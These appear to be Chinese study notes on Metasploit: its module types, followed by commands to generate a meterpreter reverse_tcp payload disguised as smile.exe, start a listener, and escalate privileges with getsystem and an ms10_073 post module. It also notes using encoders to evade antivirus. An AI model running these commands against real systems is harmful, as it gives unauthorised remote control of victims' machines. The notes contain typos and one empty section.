MSF的6个模块
auxiliary
负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块
exploits
利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击模块
payloads
成功exploit后,真正在目标系统执行的代码或指令。
分为三种类型的payload(shellcode是特殊的payload,都用于拿shell):

  • single: all-in-one 完整的payload,这些payload是一体化的,不需要依赖外部的库和包
  • stagers:目标计算机内存有限时,先传输一个较小的Payload用于建立连接
  • stages: 利用stagers建立的连接下载后续的payload

encoders
对Payload进行加密,躲避AntVirus检查的模块

nops
提高payload稳定性及维持大小

post
后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板攻击等操作。
MSF的常用操作:
1.payload生成

msfvenom -p windows/meterpreter/reverse_tcp Lhost=192.168.1.2 LPORT=8888 -f exe > smile.exe
-p <payload> -f <format> -o <path> = >

2.监听

use exploit/multi/hander
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.17.150.246 //阿里云云服务器这里是内网ip
set LPORT 8888
exploit -j

3.PHP

提权

1.getsystem

mererpreter>getsystem

2.使用exp提权

meterpreter >background //后台运行会话
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //设置要使用的会话

msf post(ms10_073_kbdlayout) >exploit

注意:如果创建了一个system进程,就可以立马session 1进入会话使用ps查看进程,然后使用migrate pid注入到进程。